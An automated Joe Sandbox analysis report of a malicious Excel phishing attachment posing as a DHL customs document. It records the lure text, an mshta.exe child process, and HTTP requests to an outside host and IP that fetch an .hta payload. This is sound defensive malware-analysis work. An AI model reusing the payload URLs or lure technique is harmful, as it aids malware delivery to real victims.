Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL AWB CUSTOM CLEARANCE.xls

Overview

General Information

Sample name:DHL AWB CUSTOM CLEARANCE.xls
Analysis ID:1591180
MD5:3954d9504039a8711e3ab29115d8054f
SHA1:d0f3ceaf0393dd82d12b66dfcf5144ea1413e31d
SHA256:26b53cef2e34ea99b37ad6e84736eeaa1851043d98b85ce831c946674b1ad1d8
Tags:xlsuser-lowmal3
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Machine Learning detection for sample
Sigma detected: Suspicious Microsoft Office Child Process
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • EXCEL.EXE (PID: 7636 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • mshta.exe (PID: 7384 cmdline: C:\Windows\SysWOW64\mshta.exe -Embedding MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • splwow64.exe (PID: 4464 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • EXCEL.EXE (PID: 744 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\DHL AWB CUSTOM CLEARANCE.xls" MD5: 4A871771235598812032C822E6F68F19)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 7636, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, ProcessId: 7384, ProcessName: mshta.exe
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 14.103.79.10, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7636, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49753
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.4, DestinationIsIpv6: false, DestinationPort: 49753, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7636, Protocol: tcp, SourceIp: 14.103.79.10, SourceIsIpv6: false, SourcePort: 443
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: DHL AWB CUSTOM CLEARANCE.xlsAvira: detected
Source: DHL AWB CUSTOM CLEARANCE.xlsReversingLabs: Detection: 34%
Source: DHL AWB CUSTOM CLEARANCE.xlsVirustotal: Detection: 25%Perma Link
Source: DHL AWB CUSTOM CLEARANCE.xlsJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 14.103.79.10:443 -> 192.168.2.4:49753 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe
Source: global trafficDNS query: name: s.deemos.com
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.4:49753
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.4:49753
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.4:49753
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.4:49753
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.4:49753
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.4:49753
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.4:49753
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.4:49753
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.4:49753
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49755
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.4:49755 -> 131.226.2.34:80
Source: excel.exeMemory has grown: Private usage: 2MB later: 97MB
Source: Joe Sandbox ViewIP Address: 14.103.79.10 14.103.79.10
Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: global trafficHTTP traffic detected: GET /hANTnNH4?&astrology=wet%20&abolishment=scintillating&pavement HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.deemos.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xampp/meno/clearpciturewithhersheisverybeautifulgirl.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /hANTnNH4?&astrology=wet%20&abolishment=scintillating&pavement HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.deemos.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xampp/meno/clearpciturewithhersheisverybeautifulgirl.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 131.226.2.34
Source: global trafficDNS traffic detected: DNS query: s.deemos.com
Source: DHL AWB CUSTOM CLEARANCE.xls, A0C30000.0.drString found in binary or memory: https://s.deemos.com/hANTnNH4?&astrology=wet
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownHTTPS traffic detected: 14.103.79.10:443 -> 192.168.2.4:49753 version: TLS 1.2

System Summary

barindex
Source: screenshotOCR: document is protected If this dcxument was the yellow bar above Once you have enabled editing. pleas
Source: screenshotOCR: protected documents This document is protected If this dcxument was the yellow bar above Once you ha
Source: screenshotOCR: Enable Content" from the yellow bar above Ready HTAG DFUIE DTEZGIOOSO VLZDGUK,I. KATA,XZVCPS DVI,VHK
Source: screenshotOCR: document is protected If this dcxument was the yellow bar above Once you have enabled editing. pleas
Source: screenshotOCR: protected documents This document is protected If this dcxument was the yellow bar above Once you ha
Source: screenshotOCR: Enable Content" from the yellow bar above DTEZGIO Ready Sheet2 Sheet3 Unavailable HTAG DFUIE DTEZGIO
Source: screenshotOCR: document is protected If this dcxument was the yellow bar above Once you have enabled editing. pleas
Source: screenshotOCR: protected documents This document is protected If this dcxument was the yellow bar above Once you ha
Source: screenshotOCR: Enable Content" from the yellow bar above 1 : Above price is ba sed on EXW China, not included any s
Source: screenshotOCR: document is protected If this dcxument was the yellow bar above Once you have enabled editing. pleas
Source: screenshotOCR: protected documents This document is protected If this dcxument was the yellow bar above Once you ha
Source: screenshotOCR: Enable Content" from the yellow bar above 1 : Above price is ba sed on EXW China, not included any s
Source: screenshotOCR: document is protected Open the document in Microsoft Office. previewing online is not available for
Source: screenshotOCR: Enable Content" from Sheetl Sheet2 Sheet3 13/7/ 224 13/7/ 224 13/7/224 13/7/224 13/7/ 224
Source: screenshotOCR: document is protected 16 17 18 20 27 28 29 30 Keep an eye on it Anch We will keep track of accessibi
Source: screenshotOCR: Enable Content" from Loading Loading completed Final calculation started Final calculation ended Car
Source: screenshotOCR: document is protected Open the document in Microsoft Office. previewing online is not available for
Source: screenshotOCR: Enable Content" from Sheetl Sheet2 Sheet3 13/7/ 224 13/7/ 224 13/7/224 13/7/224 13/7/ 224
Source: screenshotOCR: document is protected If this document was the yellow bar above Once you have enabled 3 'ting. pleas
Source: screenshotOCR: Enable Content- from the yellow bar atxwe 12/7/224 12/7/ 224 12/7/224 12/7/224 13/7/ 224 1
Source: DHL AWB CUSTOM CLEARANCE.xlsOLE: Microsoft Excel 2007+
Source: DHL AWB CUSTOM CLEARANCE.xlsOLE: Microsoft Excel 2007+
Source: DHL AWB CUSTOM CLEARANCE.xlsOLE: Microsoft Excel 2007+
Source: A0C30000.0.drOLE: Microsoft Excel 2007+
Source: A0C30000.0.drOLE: Microsoft Excel 2007+
Source: DHL AWB CUSTOM CLEARANCE.xlsOLE indicator, VBA macros: true
Source: DHL AWB CUSTOM CLEARANCE.xlsStream path 'MBD00438E10/\x1Ole' : https://s.deemos.com/hANTnNH4?&astrology=wet &abolishment=scintillating&pavementtSAfSM~H8KKG<a;TcKVdhDYiP72WPkNBlhOKhxDehl5sPFT6IKMLrSvLKcEPMne4eIKzLDCDeIBVGnW724X15EubTxrhZW72bdkEQd5eCcqUSWgDwBSDk8Z060asyQG8k6znuuI2N3G00dDERAOfF4GrCX5eYXvJnC6MbFApwrN6ukT3OCPLsNk9CNekUCFxrG7zRFaR1GtKG1GnSgKA7zrO52U5g8VEhRinRubeVGT26qdUOmhQTyrwI4UqML}ut,U3 0@cX<"u
Source: A0C30000.0.drStream path 'MBD00438E10/\x1Ole' : https://s.deemos.com/hANTnNH4?&astrology=wet &abolishment=scintillating&pavementtSAfSM~H8KKG<a;TcKVdhDYiP72WPkNBlhOKhxDehl5sPFT6IKMLrSvLKcEPMne4eIKzLDCDeIBVGnW724X15EubTxrhZW72bdkEQd5eCcqUSWgDwBSDk8Z060asyQG8k6znuuI2N3G00dDERAOfF4GrCX5eYXvJnC6MbFApwrN6ukT3OCPLsNk9CNekUCFxrG7zRFaR1GtKG1GnSgKA7zrO52U5g8VEhRinRubeVGT26qdUOmhQTyrwI4UqML}ut,U3 0@cX<"u
Source: ~DF579917254342792B.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal80.expl.winXLS@6/9@1/2
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\A0C30000Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{023325A1-ECD2-49B2-B1C9-EBBBB3D3CF52} - OProcSessId.datJump to behavior
Source: DHL AWB CUSTOM CLEARANCE.xlsOLE indicator, Workbook stream: true
Source: A0C30000.0.drOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: DHL AWB CUSTOM CLEARANCE.xlsReversingLabs: Detection: 34%
Source: DHL AWB CUSTOM CLEARANCE.xlsVirustotal: Detection: 25%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\DHL AWB CUSTOM CLEARANCE.xls"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -EmbeddingJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: c2r32.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEAutomated click: OK
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: DHL AWB CUSTOM CLEARANCE.xlsStatic file information: File size 1275904 > 1048576
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: ~DF579917254342792B.TMP.0.drInitial sample: OLE indicators vbamacros = False
Source: DHL AWB CUSTOM CLEARANCE.xlsInitial sample: OLE indicators encrypted = True
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
